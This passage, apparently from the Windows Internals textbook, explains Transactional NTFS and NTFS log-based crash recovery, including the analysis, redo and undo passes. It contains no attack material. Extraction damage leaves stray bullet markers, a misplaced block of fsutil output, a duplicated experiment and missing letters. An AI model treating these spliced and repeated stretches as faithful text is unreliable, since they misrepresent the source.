files and directories and also a file system control (FSCTL) interface for managing its resource managers.
Note Windows Vista added the support for TxF as a means to introduce atomic transac-
tions to Windows. The NTFS driver was modified without actually changing the format of
the NTFS data structures, which is why the NTFS format version number, 3.1, is the same as it
has been since Windows XP and Windows Server 2003. TxF achieves backward compatibility
by reusing the attribute type (LOGGED_UTILITY_STREAM) that was previously used only for
EFS support instead of adding a new one.
TxF is a powerful API, but due to its complexity and various issues that developers need to consider,
they have been adopted by a low number of applications. At the time of this writing, Microsoft is con-
sidering deprecating TxF APIs in a future version of Windows. For the sake of completeness, we present
only a general overview of the TxF architecture in this book.
The overall architecture for TxF, shown in Figure 11-54, uses several components:
I
Transacted APIs implemented in the Kernel32.dll library
I
A library for reading TxF logs (%SystemRoot%\System32\Txfw32.dll)
StorageReserveId
: 2
Stream
: 0x010 ::$STANDARD_INFORMATION
Attributes
: 0x00000000: *NONE*
Flags
: 0x0000000c: Resident | No clusters allocated
Size
: 72
Allocated Size
: 72
Stream
: 0x030 ::$FILE_NAME
Attributes
: 0x00000000: *NONE*
Flags
: 0x0000000c: Resident | No clusters allocated
Size
: 90
Allocated Size
: 96
Stream
: 0x030 ::$FILE_NAME
Attributes
: 0x00000000: *NONE*
Flags
: 0x0000000c: Resident | No clusters allocated
Size
: 90
Allocated Size
: 96
Stream
: 0x080 ::$DATA
Attributes
: 0x00000000: *NONE*
Flags
: 0x00000000: *NONE*
Size
: 69,632
Allocated Size
: 69,632
Extents
: 1 Extents
: 1: VCN: 0 Clusters: 17 LCN: 3,820,235
CHAPTER 11
Caching and file systems
689
I
A COM component for TxF logging functionality (%SystemRoot\System32\Txflog.dll)
I
The transactional NTFS library inside the NTFS driver
I
The CLFS infrastructure for reading and writing log records
User mode
Kernel mode
CLFS library
TxF library
Application
Transacted APIs
NTFS driver
CLFS driver
FIGURE 11-54 TxF architecture.
Isolation
Although transactional file operations are opt-in, just like the transactional registry (TxR) operations
described in Chapter 10, TxF has an effect on regular applications that are not transaction-aware
because it ensures that the transactional operations are isolated. For example, if an antivirus program
is scanning a file that’s currently being modified by another application via a transacted operation,
TxF must ensure that the scanner reads the pretransaction data, while applications that access the file
within the transaction work with the modified data. This model is called read-committed isolation.
Read-committed isolation involves the concept of transacted writers and transacted readers. The
former always view the most up-to-date version of a file, including all changes made by the transaction
that is currently associated with the file. At any given time, there can be only one transacted writer for
a file, which means that its write access is exclusive. Transacted readers, on the other hand, have access
only to the committed version of the file at the time they open the file. They are therefore isolated from
changes made by transacted writers. This allows for readers to have a consistent view of a file, even
when a transacted writer commits its changes. To see the updated data, the transacted reader must
open a new handle to the modified file.
Nontransacted writers, on the other hand, are prevented from opening the file by both transacted
writers and transacted readers, so they cannot make changes to the file without being part of the
transaction. Nontransacted readers act similarly to transacted readers in that they see only the file
contents that were last committed when the file handle was open. Unlike transacted readers, however,
they do not receive read-committed isolation, and as such they always receive the updated view of the
latest committed version of a transacted file without having to open a new file handle. This allows non-
transaction-aware applications to behave as expected.
690
CHAPTER 11
Caching and file systems
To summarize, TxF’s read-committed isolation model has the following characteristics:
I
Changes are isolated from transacted readers.
I
Changes are rolled back (undone) if the associated transaction is rolled back, if the machine
crashes, or if the volume is forcibly dismounted.
I
Changes are flushed to disk if the associated transaction is committed.
Transactional APIs
TxF implements transacted versions of the Windows file I/O APIs, which use the suffix Transacted:
I
Create APIs
CreateDirectoryTransacted, CreateFileTransacted, CreateHardLinkTransacted,
CreateSymbolicLinkTransacted
I
Find APIs
FindFirstFileNameTransacted, FindFirstFileTransacted, FindFirstStreamTransacted
I
Query APIs
GetCompressedFileSizeTransacted, GetFileAttributesTransacted,
GetFullPathNameTransacted, GetLongPathNameTransacted
I
Delete APIs
DeleteFileTransacted, RemoveDirectoryTransacted
I
Copy and Move/Rename APIs
CopyFileTransacted, MoveFileTransacted
I
Set APIs
SetFileAttributesTransacted
In addition, some APIs automatically participate in transacted operations when the file handle they
are passed is part of a transaction, like one created by the CreateFileTransacted API. Table 11-10 lists
Windows APIs that have modified behavior when dealing with a transacted file handle.
TABLE 11-10 API behavior changed by TxF
API Name
Change
CloseHandle
Transactions aren’t committed until all applications close transacted
handles to the file.
CreateFileMapping, MapViewOfFile
Modifications to mapped views of a file part of a transaction are associ-
ated with the transaction themselves.
FindNextFile, ReadDirectoryChanges,
GetInformationByHandle, GetFileSize
If the file handle is part of a transaction, read-isolation rules are applied
to these operations.
GetVolumeInformation
Function returns FILE_SUPPORTS_TRANSACTIONS if the volume sup-
ports TxF.
ReadFile, WriteFile
Read and write operations to a transacted file handle are part of the
transaction.
SetFileInformationByHandle
Changes to the FileBasicInfo, FileRenameInfo, FileAllocationInfo,
FileEndOfFileInfo, and FileDispositionInfo classes are transacted if the file
handle is part of a transaction.
SetEndOfFile, SetFileShortName, SetFileTime
Changes are transacted if the file handle is part of a transaction.
CHAPTER 11
Caching and file systems
691
On-disk implementation
As shown earlier in Table 11-7, TxF uses the LOGGED_UTILITY_STREAM attribute type to store addi-
tional data for files and directories that are or have been part of a transaction. This attribute is called
TXF_DATA and contains important information that allows TxF to keep active offline data for a file part
of a transaction. The attribute is permanently stored in the MFT; that is, even after the file is no longer
part of a transaction, the stream remains, for reasons explained soon. The major components of the
attribute are shown in Figure 11-55.
File record number of RM root
Flags
TxF file ID (TxID)
LSN for NTFS metadata
LSN for user data
LSN for directory index
USN index
FIGURE 11-55 TXF_DATA attribute.
The first field shown is the file record number of the root of the resource manager responsible for
the transaction associated with this file. For the default resource manager, the file record number is 5,
which is the file record number for the root directory (\) in the MFT, as shown earlier in Figure 11-31.
TxF needs this information when it creates an FCB for the file so that it can link it to the correct resource
manager, which in turn needs to create an enlistment for the transaction when a transacted file request
is received by NTFS.
Another important piece of data stored in the TXF_DATA attribute is the TxF file ID, or TxID, and
this explains why TXF_DATA attributes are never deleted. Because NTFS writes file names to its records
when writing to the transaction log, it needs a way to uniquely identify files in the same directory
that may have had the same name. For example, if sample.txt is deleted from a directory in a transac-
tion and later a new file with the same name is created in the same directory (and as part of the same
transaction), TxF needs a way to uniquely identify the two instances of sample.txt. This identification is
provided by a 64-bit unique number, the TxID, that TxF increments when a new file (or an instance of
a file) becomes part of a transaction. Because they can never be reused, TxIDs are permanent, so the
TXF_DATA attribute will never be removed from a file.
Last but not least, three CLFS (Common Logging File System) LSNs are stored for each file part of a
transaction. Whenever a transaction is active, such as during create, rename, or write operations, TxF
writes a log record to its CLFS log. Each record is assigned an LSN, and that LSN gets written to the
appropriate field in the TXF_DATA attribute. The first LSN is used to store the log record that identifies
the changes to NTFS metadata in relation to this file. For example, if the standard attributes of a file are
changed as part of a transacted operation, TxF must update the relevant MFT file record, and the LSN
for the log record describing the change is stored. TxF uses the second LSN when the file’s data is modi-
fied. Finally, TxF uses the third LSN when the file name index for the directory requires a change related
to a transaction the file took part in, or when a directory was part of a transaction and received a TxID.
692
CHAPTER 11
Caching and file systems
The TXF_DATA attribute also stores internal flags that describe the state information to TxF and the
index of the USN record that was applied to the file on commit. A TxF transaction can span multiple
USN records that may have been partly updated by NTFS’s recovery mechanism (described shortly), so
the index tells TxF how many more USN records must be applied after a recovery.
TxF uses a default resource manager, one for each volume, to keep track of its transactional state.
TxF, however, also supports additional resource managers called secondary resource managers. These
resource managers can be defined by application writers and have their metadata located in any
directory of the application’s choosing, defining their own transactional work units for undo, backup,
restore, and redo operations. Both the default resource manager and secondary resource managers
contain a number of metadata files and directories that describe their current state:
I
The Txf directory, located into Extend\RmMetadata directory, which is where files are linked
when they are deleted or overwritten by transactional operations.
I
The Tops, or TxF Old Page Stream (TOPS) file, which contains a default data stream and an al-
ternate data stream called T. The default stream for the TOPS file contains metadata about the
resource manager, such as its GUID, its CLFS log policy, and the LSN at which recovery should
start. The T stream contains file data that is partially overwritten by a transactional writer (as
opposed to a full overwrite, which would move the file into the Txf directory).
I
The TxF log files, which are CLFS log files storing transaction records. For the default resource
manager, these files are part of the TxfLog directory, but secondary resource managers can
store them anywhere. TxF uses a multiplexed base log file called TxfLog.blf. The file \Extend
\RmMetadata\TxfLog\TxfLog contains two streams: the KtmLog stream used for Kernel
Transaction Manager metadata records, and the TxfLog stream, which contains the TxF
log records.
EXPERIMENT: Querying resource manager information
You can use the built-in Fsutil.exe command-line program to query information about the
default resource manager as well as to create, start, and stop secondary resource managers and
configure their logging policies and behaviors. The following command queries information
about the default resource manager, which is identified by the root directory (\):
d:\>fsutil resource info \
Resource Manager Identifier : 81E83020-E6FB-11E8-B862-D89EF33A38A7
KTM Log Path for RM: \Device\HarddiskVolume8\$Extend\$RmMetadata\$TxfLog\$TxfLog::KtmLog
Space used by TOPS: 1 Mb
TOPS free space: 100%
RM State: Active
Running transactions: 0
One phase commits: 0
Two phase commits: 0
System initiated rollbacks: 0
Age of oldest transaction: 00:00:00
Logging Mode: Simple
Number of containers: 2
EXPERIMENT: Querying resource manager information
You can use the built-in Fsutil.exe command-line program to query information about the
default resource manager as well as to create, start, and stop secondary resource managers and
configure their logging policies and behaviors. The following command queries information
about the default resource manager, which is identified by the root directory (\):
d:\>fsutil resource info \
Resource Manager Identifier : 81E83020-E6FB-11E8-B862-D89EF33A38A7
KTM Log Path for RM: \Device\HarddiskVolume8\$Extend\$RmMetadata\$TxfLog\$TxfLog::KtmLog
Space used by TOPS: 1 Mb
TOPS free space: 100%
RM State: Active
Running transactions: 0
One phase commits: 0
Two phase commits: 0
System initiated rollbacks: 0
Age of oldest transaction: 00:00:00
Logging Mode: Simple
Number of containers: 2
CHAPTER 11
Caching and file systems
693
Container size:
10 Mb
Total log capacity: 20 Mb
Total free log space: 19 Mb
Minimum containers: 2
Maximum containers: 20
Log growth increment: 2 container(s)
Auto shrink:
Not enabled
RM prefers availability over consistency.
As mentioned, the fsutil resource command has many options for configuring TxF resource
managers, including the ability to create a secondary resource manager in any directory of your
choice. For example, you can use the fsutil resource create c:\rmtest command to create a
secondary resource manager in the Rmtest directory, followed by the fsutil resource start
c:\rmtest command to initiate it. Note the presence of the Tops and TxfLogContainer files
and of the TxfLog and Txf directories in this folder.
Logging implementation
As mentioned earlier, each time a change is made to the disk because of an ongoing transaction, TxF
writes a record of the change to its log. TxF uses a variety of log record types to keep track of trans-
actional changes, but regardless of the record type, all TxF log records have a generic header that
contains information identifying the type of the record, the action related to the record, the TxID that
the record applies to, and the GUID of the KTM transaction that the record is associated with.
A redo record specifies how to reapply a change part of a transaction that’s already been committed
to the volume if the transaction has actually never been flushed from cache to disk. An undo record, on
the other hand, specifies how to reverse a change part of a transaction that hasn’t been committed at
the time of a rollback. Some records are redo-only, meaning they don’t contain any equivalent undo
data, whereas other records contain both redo and undo information.
Through the TOPS file, TxF maintains two critical pieces of data, the base LSN and the restart LSN.
The base LSN determines the LSN of the first valid record in the log, while the restart LSN indicates
at which LSN recovery should begin when starting the resource manager. When TxF writes a restart
record, it updates these two values, indicating that changes have been made to the volume and flushed
out to disk—meaning that the file system is fully consistent up to the new restart LSN.
TxF also writes compensating log records or CLRs. These records store the actions that are being
performed during transaction rollback. They’re primarily used to store the undo-next LSN which allows
the recovery process to avoid repeated undo operations by bypassing undo records that have already
been processed, a situation that can happen if the system fails during the recovery phase and has
already performed part of the undo pass. Finally, TxF also deals with prepare records, abort records and
commit records which describe the state of the KTM transactions related to TxF.
Container size:
10 Mb
Total log capacity: 20 Mb
Total free log space: 19 Mb
Minimum containers: 2
Maximum containers: 20
Log growth increment: 2 container(s)
Auto shrink:
Not enabled
RM prefers availability over consistency.
As mentioned, the fsutil resource command has many options for configuring TxF resource
managers, including the ability to create a secondary resource manager in any directory of your
choice. For example, you can use the fsutil resource create c:\rmtest command to create a
secondary resource manager in the Rmtest directory, followed by the fsutil resource start
c:\rmtest command to initiate it. Note the presence of the Tops and TxfLogContainer files
and of the TxfLog and Txf directories in this folder.
694
CHAPTER 11
Caching and file systems
NTFS recovery support
NTFS recovery support ensures that if a power failure or a system failure occurs, no file system opera-
tions (transactions) will be left incomplete, and the structure of the disk volume will remain intact
without the need to run a disk repair utility. The NTFS Chkdsk utility is used to repair catastrophic disk
corruption caused by I/O errors (bad disk sectors, electrical anomalies, or disk failures, for example) or
software bugs. But with the NTFS recovery capabilities in place, Chkdsk is rarely needed.
As mentioned earlier (in the section “Recoverability”), NTFS uses a transaction-processing scheme to
implement recoverability. This strategy ensures a full disk recovery that is also extremely fast (on the order
of seconds) for even the largest disks. NTFS limits its recovery procedures to file system data to ensure
that at the very least the user will never lose a volume because of a corrupted file system; however, unless
an application takes specific action (such as flushing cached files to disk), NTFS’s recovery support doesn’t
guarantee user data to be fully updated if a crash occurs. This is the job of transactional NTFS (TxF).
The following sections detail the transaction-logging scheme NTFS uses to record modifications to
file system data structures and explain how NTFS recovers a volume if the system fails.
Design
NTFS implements the design of a recoverable file system. These file systems ensure volume consistency by
using logging techniques (sometimes called ournaling) originally developed for transaction processing.
If the operating system crashes, the recoverable file system restores consistency by executing a recovery
procedure that accesses information that has been stored in a log file. Because the file system has logged
its disk writes, the recovery procedure takes only seconds, regardless of the size of the volume (unlike
in the FAT file system, where the repair time is related to the volume size). The recovery procedure for a
recoverable file system is exact, guaranteeing that the volume will be restored to a consistent state.
A recoverable file system incurs some costs for the safety it provides. Every transaction that alters the
volume structure requires that one record be written to the log file for each of the transaction’s sub-
operations. This logging overhead is ameliorated by the file system’s batching of log records—writing
many records to the log file in a single I/O operation. In addition, the recoverable file system can employ
the optimization techniques of a lazy write file system. It can even increase the length of the intervals
between cache flushes because the file system metadata can be recovered if the system crashes before
the cache changes have been flushed to disk. This gain over the caching performance of lazy write file
systems makes up for, and often exceeds, the overhead of the recoverable file system’s logging activity.
Neither careful write nor lazy write file systems guarantee protection of user file data. If the system
crashes while an application is writing a file, the file can be lost or corrupted. Worse, the crash can cor-
rupt a lazy write file system, destroying existing files or even rendering an entire volume inaccessible.
The NTFS recoverable file system implements several strategies that improve its reliability over that
of the traditional file systems. First, NTFS recoverability guarantees that the volume structure won’t
be corrupted, so all files will remain accessible after a system failure. Second, although NTFS doesn’t
guarantee protection of user data in the event of a system crash—some changes can be lost from the
CHAPTER 11
Caching and file systems
695
cache—applications can take advantage of the NTFS write-through and cache-flushing capabilities to
ensure that file modifications are recorded on disk at appropriate intervals.
Both cache write-through—forcing write operations to be immediately recorded on disk—and
cache ushing—forcing cache contents to be written to disk—are efficient operations. NTFS doesn’t
have to do extra disk I/O to flush modifications to several different file system data structures because
changes to the data structures are recorded—in a single write operation—in the log file; if a fail-
ure occurs and cache contents are lost, the file system modifications can be recovered from the log.
Furthermore, unlike the FAT file system, NTFS guarantees that user data will be consistent and available
immediately after a write-through operation or a cache flush, even if the system subsequently fails.
Metadata logging
NTFS provides file system recoverability by using the same logging technique used by TxF, which consists
of recording all operations that modify file system metadata to a log file. Unlike TxF, however, NTFS’s
built-in file system recovery support doesn’t make use of CLFS but uses an internal logging implemen-
tation called the log file service (which is not a background service process as described in Chapter 10).
Another difference is that while TxF is used only when callers opt in for transacted operations, NTFS re-
cords all metadata changes so that the file system can be made consistent in the face of a system failure.
Log file service
The log file service (LFS) is a series of kernel-mode routines inside the NTFS driver that NTFS uses to
access the log file. NTFS passes the LFS a pointer to an open file object, which specifies a log file to be
accessed. The LFS either initializes a new log file or calls the Windows cache manager to access the ex-
isting log file through the cache, as shown in Figure 11-56. Note that although LFS and CLFS have similar
sounding names, they’re separate logging implementations used for different purposes, although their
operation is similar in many ways.
Log file
service
Flush the
log file
Read/write/flush
the log file
Log the transaction
Write the
volume updates
NTFS driver
…
I/O manager
Cache
manager
Call the memory
manager to access
the mapped file
FIGURE 11-56 Log file service (LFS).
696
CHAPTER 11
Caching and file systems
The LFS divides the log file into two regions: a restart area and an “infinite” logging area, as shown in
Figure 11-57.
Log records
Logging area
Copy 2
Copy 1
LFS restart area
FIGURE 11-57 Log file regions.
NTFS calls the LFS to read and write the restart area. NTFS uses the restart area to store context in-
formation such as the location in the logging area at which NTFS begins to read during recovery after a
system failure. The LFS maintains a second copy of the restart data in case the first becomes corrupted
or otherwise inaccessible. The remainder of the log file is the logging area, which contains transaction
records NTFS writes to recover a volume in the event of a system failure. The LFS makes the log file ap-
pear infinite by reusing it circularly (while guaranteeing that it doesn’t overwrite information it needs).
Just like CLFS, the LFS uses LSNs to identify records written to the log file. As the LFS cycles through the
file, it increases the values of the LSNs. NTFS uses 64 bits to represent LSNs, so the number of possible
LSNs is so large as to be virtually infinite.
NTFS never reads transactions from or writes transactions to the log file directly. The LFS provides
services that NTFS calls to open the log file, write log records, read log records in forward or backward
order, flush log records up to a specified LSN, or set the beginning of the log file to a higher LSN. During
recovery, NTFS calls the LFS to perform the same actions as described in the TxF recovery section: a redo
pass for nonflushed committed changes, followed by an undo pass for noncommitted changes.
Here’s how the system guarantees that the volume can be recovered:
1.
NTFS first calls the LFS to record in the (cached) log file any transactions that will modify the
volume structure.
2.
NTFS modifies the volume (also in the cache).
3.
The cache manager prompts the LFS to flush the log file to disk. (The LFS implements the flush
by calling the cache manager back, telling it which pages of memory to flush. Refer back to the
calling sequence shown in Figure 11-56.)
4.
After the cache manager flushes the log file to disk, it flushes the volume changes (the meta-
data operations themselves) to disk.
These steps ensure that if the file system modifications are ultimately unsuccessful, the correspond-
ing transactions can be retrieved from the log file and can be either redone or undone as part of the
file system recovery procedure.
CHAPTER 11
Caching and file systems
697
File system recovery begins automatically the first time the volume is used after the system is re-
booted. NTFS checks whether the transactions that were recorded in the log file before the crash were
applied to the volume, and if they weren’t, it redoes them. NTFS also guarantees that transactions not
completely logged before the crash are undone so that they don’t appear on the volume.
Log record types
The NTFS recovery mechanism uses similar log record types as the TxF recovery mechanism: update re-
cords, which correspond to the redo and undo records that TxF uses, and checkpoint records, which are
similar to the restart records used by TxF. Figure 11-58 shows three update records in the log file. Each
record represents one suboperation of a transaction, creating a new file. The redo entry in each update
record tells NTFS how to reapply the suboperation to the volume, and the undo entry tells NTFS how to
roll back (undo) the suboperation.
Redo: Allocate/initialize an MFT file record
Undo: Deallocate the file record
Redo: Set bits 3–9 in the bitmap
Undo: Clear bits 3–9 in the bitmap
Redo: Add the file name to the index
Undo: Remove the file name from the index
LFS restart area
Logging area
Log file records
T1a
T1b
T1c
…
...
FIGURE 11-58 Update records in the log file.
After logging a transaction (in this example, by calling the LFS to write the three update records to the
log file), NTFS performs the suboperations on the volume itself, in the cache. When it has finished updat-
ing the cache, NTFS writes another record to the log file, recording the entire transaction as complete—a
suboperation known as committing a transaction. Once a transaction is committed, NTFS guarantees that
the entire transaction will appear on the volume, even if the operating system subsequently fails.
When recovering after a system failure, NTFS reads through the log file and redoes each commit-
ted transaction. Although NTFS completed the committed transactions from before the system failure,
it doesn’t know whether the cache manager flushed the volume modifications to disk in time. The
updates might have been lost from the cache when the system failed. Therefore, NTFS executes the
committed transactions again just to be sure that the disk is up to date.
After redoing the committed transactions during a file system recovery, NTFS locates all the transac-
tions in the log file that weren’t committed at failure and rolls back each suboperation that had been
logged. In Figure 11-58, NTFS would first undo the T1c suboperation and then follow the backward
pointer to T1b and undo that suboperation. It would continue to follow the backward pointers, undoing
suboperations, until it reached the first suboperation in the transaction. By following the pointers, NTFS
knows how many and which update records it must undo to roll back a transaction.
698
CHAPTER 11
Caching and file systems
Redo and undo information can be expressed either physically or logically. As the lowest layer of
software maintaining the file system structure, NTFS writes update records with physical descriptions that
specify volume updates in terms of particular byte ranges on the disk that are to be changed, moved,
and so on, unlike TxF, which uses logical descriptions that express updates in terms of operations such as
“delete file A.dat.” NTFS writes update records (usually several) for each of the following transactions:
I
Creating a file
I
Deleting a file
I
Extending a file
I
Truncating a file
I
Setting file information
I
Renaming a file
I
Changing the security applied to a file
The redo and undo information in an update record must be carefully designed because although
NTFS undoes a transaction, recovers from a system failure, or even operates normally, it might try to
redo a transaction that has already been done or, conversely, to undo a transaction that never occurred
or that has already been undone. Similarly, NTFS might try to redo or undo a transaction consisting of
several update records, only some of which are complete on disk. The format of the update records
must ensure that executing redundant redo or undo operations is idempotent—that is, has a neutral ef-
fect. For example, setting a bit that is already set has no effect, but toggling a bit that has already been
toggled does. The file system must also handle intermediate volume states correctly.
In addition to update records, NTFS periodically writes a checkpoint record to the log file, as illus-
trated in Figure 11-59.
Checkpoint
record
LFS restart area
NTFS restart
Logging area
Log file records
LSN
2058
LSN
2061
...
...
LSN
2059
LSN
2060
FIGURE 11-59 Checkpoint record in the log file.
A checkpoint record helps NTFS determine what processing would be needed to recover a volume if
a crash were to occur immediately. Using information stored in the checkpoint record, NTFS knows, for
example, how far back in the log file it must go to begin its recovery. After writing a checkpoint record,
NTFS stores the LSN of the record in the restart area so that it can quickly find its most recently written
checkpoint record when it begins file system recovery after a crash occurs; this is similar to the restart
LSN used by TxF for the same reason.
CHAPTER 11
Caching and file systems
699
Although the LFS presents the log file to NTFS as if it were infinitely large, it isn’t. The generous size
of the log file and the frequent writing of checkpoint records (an operation that usually frees up space
in the log file) make the possibility of the log file filling up a remote one. Nevertheless, the LFS, just like
CLFS, accounts for this possibility by tracking several operational parameters:
I
The available log space
I
The amount of space needed to write an incoming log record and to undo the write, should
that be necessary
I
The amount of space needed to roll back all active (noncommitted) transactions, should that
be necessary
If the log file doesn’t contain enough available space to accommodate the total of the last two
items, the LFS returns a “log file full” error, and NTFS raises an exception. The NTFS exception handler
rolls back the current transaction and places it in a queue to be restarted later.
To free up space in the log file, NTFS must momentarily prevent further transactions on files. To
do so, NTFS blocks file creation and deletion and then requests exclusive access to all system files and
shared access to all user files. Gradually, active transactions either are completed successfully or receive
the “log file full” exception. NTFS rolls back and queues the transactions that receive the exception.
Once it has blocked transaction activity on files as just described, NTFS calls the cache manager to
flush unwritten data to disk, including unwritten log file data. After everything is safely flushed to disk,
NTFS no longer needs the data in the log file. It resets the beginning of the log file to the current posi-
tion, making the log file “empty.” Then it restarts the queued transactions. Beyond the short pause in
I/O processing, the log file full error has no effect on executing programs.
This scenario is one example of how NTFS uses the log file not only for file system recovery but also for
error recovery during normal operation. You find out more about error recovery in the following section.
Recovery
NTFS automatically performs a disk recovery the first time a program accesses an NTFS volume after
the system has been booted. (If no recovery is needed, the process is trivial.) Recovery depends on two
tables NTFS maintains in memory: a transaction table, which behaves just like the one TxF maintains,
and a dirty page table which records which pages in the cache contain modifications to the file system
structure that haven’t yet been written to disk. This data must be flushed to disk during recovery.
NTFS writes a checkpoint record to the log file once every 5 seconds. Just before it does, it calls
the LFS to store a current copy of the transaction table and of the dirty page table in the log file. NTFS
then records in the checkpoint record the LSNs of the log records containing the copied tables. When
recovery begins after a system failure, NTFS calls the LFS to locate the log records containing the most
recent checkpoint record and the most recent copies of the transaction and dirty page tables. It then
copies the tables to memory.
The log file usually contains more update records following the last checkpoint record. These
update records represent volume modifications that occurred after the last checkpoint record was
700
CHAPTER 11
Caching and file systems
written. NTFS must update the transaction and dirty page tables to include these operations. After
updating the tables, NTFS uses the tables and the contents of the log file to update the volume itself.
To perform its volume recovery, NTFS scans the log file three times, loading the file into memory
during the first pass to minimize disk I/O. Each pass has a particular purpose:
1.
Analysis
2.
Redoing transactions
3.
Undoing transactions
Analysis pass
During the analysis pass, as shown in Figure 11-60, NTFS scans forward in the log file from the begin-
ning of the last checkpoint operation to find update records and use them to update the transaction
and dirty page tables it copied to memory. Notice in the figure that the checkpoint operation stores
three records in the log file and that update records might be interspersed among these records. NTFS
therefore must start its scan at the beginning of the checkpoint operation.
Analysis pass
Beginning of
checkpoint operation
End of checkpoint
operation
Dirty page
table
Update
record
Transaction
table
Checkpoint
record
Update
record
Update
record
...
...
FIGURE 11-60 Analysis pass.
Most update records that appear in the log file after the checkpoint operation begins represent a
modification to either the transaction table or the dirty page table. If an update record is a “transac-
tion committed” record, for example, the transaction the record represents must be removed from the
transaction table. Similarly, if the update record is a page update record that modifies a file system data
structure, the dirty page table must be updated to reflect that change.
Once the tables are up to date in memory, NTFS scans the tables to determine the LSN of the oldest
update record that logs an operation that hasn’t been carried out on disk. The transaction table con-
tains the LSNs of the noncommitted (incomplete) transactions, and the dirty page table contains the
LSNs of records in the cache that haven’t been flushed to disk. The LSN of the oldest update record that
NTFS finds in these two tables determines where the redo pass will begin. If the last checkpoint record
is older, however, NTFS will start the redo pass there instead.
Note In the TxF recovery model, there is no distinct analysis pass. Instead, as described in
the TxF recovery section, TxF performs the equivalent work in the redo pass.
CHAPTER 11
Caching and file systems
701
Redo pass
During the redo pass, as shown in Figure 11-61, NTFS scans forward in the log file from the LSN of the
oldest update record, which it found during the analysis pass. It looks for page update records, which
contain volume modifications that were written before the system failure but that might not have been
flushed to disk. NTFS redoes these updates in the cache.
Redo pass
Beginning of
checkpoint operation
Oldest unwritten
log record
Dirty page
table
Update
record
Update
record
Transaction
table
Checkpoint
record
Update
record
...
...
...
FIGURE 11-61 Redo pass.
When NTFS reaches the end of the log file, it has updated the cache with the necessary volume modi-
fications, and the cache manager’s lazy writer can begin writing cache contents to disk in the background.
Undo pass
After it completes the redo pass, NTFS begins its undo pass, in which it rolls back any transactions that
weren’t committed when the system failed. Figure 11-62 shows two transactions in the log file; transac-
tion 1 was committed before the power failure, but transaction 2 wasn’t. NTFS must undo transaction 2.
...
LSN
4044
LSN
4049
LSN
4045
LSN
4046
LSN
4047
LSN
4048
“Transaction committed” record
Transaction 1
Transaction 2
Undo pass
Power failure
FIGURE 11-62 Undo pass.
Suppose that transaction 2 created a file, an operation that comprises three suboperations, each
with its own update record. The update records of a transaction are linked by backward pointers in the
log file because they aren’t usually contiguous.
The NTFS transaction table lists the LSN of the last-logged update record for each noncommitted
transaction. In this example, the transaction table identifies LSN 4049 as the last update record logged
for transaction 2. As shown from right to left in Figure 11-63, NTFS rolls back transaction 2.
702
CHAPTER 11
Caching and file systems
...
LSN
4044
LSN
4049
LSN
4045
LSN
4046
LSN
4047
LSN
4048
Transaction 1
Transaction 2
Redo: Allocate/initialize an MFT file record
Undo: Deallocate the file record
Redo: Add the file name to the index
Undo: Remove the file name from the index
Redo: Set bits 3–9 in the bitmap
Undo: Clear bits 3–9 in the bitmap
FIGURE 11-63 Undoing a transaction.
After locating LSN 4049, NTFS finds the undo information and executes it, clearing bits 3 through
9 in its allocation bitmap. NTFS then follows the backward pointer to LSN 4048, which directs it to
remove the new file name from the appropriate file name index. Finally, it follows the last backward
pointer and deallocates the MFT file record reserved for the file, as the update record with LSN 4046
specifies. Transaction 2 is now rolled back. If there are other noncommitted transactions to undo, NTFS
follows the same procedure to roll them back. Because undoing transactions affects the volume’s file
system structure, NTFS must log the undo operations in the log file. After all, the power might fail again
during the recovery, and NTFS would have to redo its undo operations
When the undo pass of the recovery is finished, the volume has been restored to a consistent state.
At this point, NTFS is prepared to flush the cache changes to disk to ensure that the volume is up to
date. Before doing so, however, it executes a callback that TxF registers for notifications of LFS flushes.
Because TxF and NTFS both use write-ahead logging, TxF must flush its log through CLFS before the
NTFS log is flushed to ensure consistency of its own metadata. (And similarly, the TOPS file must be
flushed before the CLFS-managed log files.) NTFS then writes an “empty” LFS restart area to indicate
that the volume is consistent and that no recovery need be done if the system should fail again imme-
diately. Recovery is complete.
NTFS guarantees that recovery will return the volume to some preexisting consistent state, but not
necessarily to the state that existed just before the system crash. NTFS can’t make that guarantee be-
cause, for performance, it uses a lazy commit algorithm, which means that the log file isn’t immediately
flushed to disk each time a transaction committed record is written. Instead, numerous transaction
committed records are batched and written together, either when the cache manager calls the LFS to
flush the log file to disk or when the LFS writes a checkpoint record (once every 5 seconds) to the log
file. Another reason the recovered volume might not be completely up to date is that several paral-
lel transactions might be active when the system crashes, and some of their transaction committed
records might make it to disk, whereas others might not. The consistent volume that recovery produces
includes all the volume updates whose transaction committed records made it to disk and none of the
updates whose transaction committed records didn’t make it to disk.
CHAPTER 11
Caching and file systems
703
NTFS uses the log file to recover a volume after the system fails, but it also takes advantage of an im-
portant freebie it gets from logging transactions. File systems necessarily contain a lot of code devoted
to recovering from file system errors that occur during the course of normal file I/O. Because NTFS logs
each transaction that modifies the volume structure, it can use the log file to recover when a file system
error occurs and thus can greatly simplify its error handling code. The log file full error described earlier
is one example of using the log file for error recovery.
Most I/O errors that a program receives aren’t file system errors and therefore can’t be resolved
entirely by NTFS. When called to create a file, for example, NTFS might begin by creating a file record in
the MFT and then enter the new file’s name in a directory index. When it tries to allocate space for the
file in its bitmap, however, it could discover that the disk is full and the create request can’t be com-
pleted. In such a case, NTFS uses the information in the log file to undo the part of the operation it has
already completed and to deallocate the data structures it reserved for the file. Then it returns a disk
full error to the caller, which in turn must respond appropriately to the error.
NTFS bad-cluster recovery
The volume manager included with Windows (VolMgr) can recover data from a bad sector on a
fault-tolerant volume, but if the hard disk doesn’t perform bad-sector remapping or runs out of spare
sectors, the volume manager can’t perform bad-sector replacement to replace the bad sector. When
the file system reads from the sector, the volume manager instead recovers the data and returns the
warning to the file system that there is only one copy of the data.
The FAT file system doesn’t respond to this volume manager warning. Moreover, neither FAT nor the
volume manager keeps track of the bad sectors, so a user must run the Chkdsk or Format utility to pre-
vent the volume manager from repeatedly recovering data for the file system. Both Chkdsk and Format
are less than ideal for removing bad sectors from use. Chkdsk can take a long time to find and remove
bad sectors, and Format wipes all the data off the partition it’s formatting.
In the file system equivalent of a volume manager’s bad-sector replacement, NTFS dynamically re-
places the cluster containing a bad sector and keeps track of the bad cluster so that it won’t be reused.
(Recall that NTFS maintains portability by addressing logical clusters rather than physical sectors.) NTFS
performs these functions when the volume manager can’t perform bad-sector replacement. When a
volume manager returns a bad-sector warning or when the hard disk driver returns a bad-sector error,
NTFS allocates a new cluster to replace the one containing the bad sector. NTFS copies the data that
the volume manager has recovered into the new cluster to reestablish data redundancy.
Figure 11-64 shows an MFT record for a user file with a bad cluster in one of its data runs as it existed
